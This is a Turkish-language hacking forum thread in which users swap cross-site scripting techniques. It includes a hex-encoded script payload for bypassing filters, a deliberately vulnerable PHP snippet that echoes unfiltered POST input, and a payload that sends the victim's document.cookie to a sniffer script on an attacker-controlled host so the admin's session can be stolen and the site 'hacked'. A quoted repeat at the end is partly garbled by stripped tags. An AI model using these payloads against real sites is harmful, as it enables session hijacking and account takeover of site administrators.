Farklı XSS Yöntemleri
-
Arkadaşlar merhaba.
Ne gibi farklı XSS yöntemleri var ?
Daha açıklayıcı olması bakımından şöyle anlatayım. mesela bir bildiğimiz standart js çalıştırma şeklinde. sayfa uzantısına
<script>alert("xss");</script>
yazarak yaptığımız xss saldırıları var. bundan başka ne gibi komutlar yazabiliriz ?
-
döküman arşivinde xss ile ilgili bayâ bi döküman var
-
aletin içerisine, javascriptle, cookie post edecek kod koyup, o sayfayı admine actırabilirsen, cookieyi alabilirsin hocam...
-
bazı sistemlerde html taglarına izin vermiyorlar % falan kullanarak bişeyler yapılıyor sanırım ama nasıl olduğunu bilmiyorum. html tagları kullanmadan yapmak mümkün mü ?
-
html taglarini hex'e cevirip bu filtrelemeyi asabiliyorsunuz.
%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%5c%27%78%73%73%5c%5c%6e%78%33%75%71%6d%34%5c%27%29%3b%3c%2f%73%63%72%69%70%74%3e
Mesela ustteki kodda, <script>alert('xss\nx3uqm4');</script> yaziyor.
XSS Sadece adres cubuguna yazilarak olmuyor tabii :)
Mesela bi forum sitesi dusunelim. acemice kodlanmis. kendinize bi avatar ayarlayacaksiniz. resim urlsi istiyor, url yerine <script>alert('xss');</script> yazip bi xss acigi deneyebilirsiniz. eger xss varsa basit bi konu acip admini sayfaya cekersiniz, cookiesini alir ve hacklersiniz.
mesela kodlar su, (postatilacaksayfa.php)
<?php
$resim=$_POST['resim'];
echo '<img src=" $resim " />';
?>
$resim degiskeni onceki sayfada belirtiliyor. post yontemiyle atiliyor. bu sekilde dusunelim. bu sayfada, ilk satirdaki kod ile veri cekiliyor. ikinci satirda resim gosteriliyor.
Post atilan sayfada su olsun;
<form action="postatilacaksayfa.php" method="post">
Resim adresi: <input type="text" name="resim" value"" />
<input type="submit" name="gonder" "value="Gonder" />
</form>
buda post.html olsun.Simdi burda herhangi bir filtreleme vs bir islem yok.
Biz post.html`de resim adresine,
http://www.hackerinsitesi.com/sniffer/s.php?'+document.cookie
Yazarsak, resim yerine s.php sayfasini gosterir. s.php sayfasinadaysa cookieler calinir.
Tek yapmamiz gereken resmi gostermek :)
Direk sniffer yerine, kod calistirmak icin;
post.html sayfasindaki resim adresine,
"/>'; yazdiktan sonra istedigimiz kodu enjekte edebiliriz. ornegin,
"/>'; echo "xss"; echo "<script>alert('xss');</script>";
Tarzinda sayfada istedigimizi gosterebiliriz.
Umarim yararli olmustur. kodlari acip denemedim ufak hatalar olabilir :) -
x3uqm4 bunu yazdı:
-----------------------------
html taglarini hex'e cevirip bu filtrelemeyi asabiliyorsunuz.
< ="postatilacaksayfa.php" method="post">
%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%5c%27%78%73%73%5c%5c%6e%78%33%75%71%6d%34%5c%27%29%3b%3c%2f%73%63%72%69%70%74%3e
Mesela ustteki kodda, // yaziyor.
XSS Sadece adres cubuguna yazilarak olmuyor tabii :)
Mesela bi forum sitesi dusunelim. acemice kodlanmis. kendinize bi avatar ayarlayacaksiniz. resim urlsi istiyor, url yerine // yazip bi xss acigi deneyebilirsiniz. eger xss varsa basit bi konu acip admini sayfaya cekersiniz, cookiesini alir ve hacklersiniz.
mesela kodlar su, (postatilacaksayfa.php)
$resim=$_POST['resim'];
echo '';
?>
$resim degiskeni onceki sayfada belirtiliyor. post yontemiyle atiliyor. bu sekilde dusunelim. bu sayfada, ilk satirdaki kod ile veri cekiliyor. ikinci satirda resim gosteriliyor.
Post atilan sayfada su olsun;
Resim adresi: < name="resim" ="text" />
< name="gonder" ="submit" value="Gonder" />
>
buda post.html olsun.Simdi burda herhangi bir filtreleme vs bir islem yok.
Biz post.html`de resim adresine,
http://www.hackerinsitesi.com/sniffer/s.php?'+document.cookie
Yazarsak, resim yerine s.php sayfasini gosterir. s.php sayfasinadaysa cookieler calinir.
Tek yapmamiz gereken resmi gostermek :)
Direk sniffer yerine, kod calistirmak icin;
post.html sayfasindaki resim adresine,
"/>'; yazdiktan sonra istedigimiz kodu enjekte edebiliriz. ornegin,
"/>'; echo "xss"; echo " // ";
Tarzinda sayfada istedigimizi gosterebiliriz.
Umarim yararli olmustur. kodlari acip denemedim ufak hatalar olabilir :)
-----------------------------Teşekkürler =). Bir de böyle deneyeyim=)
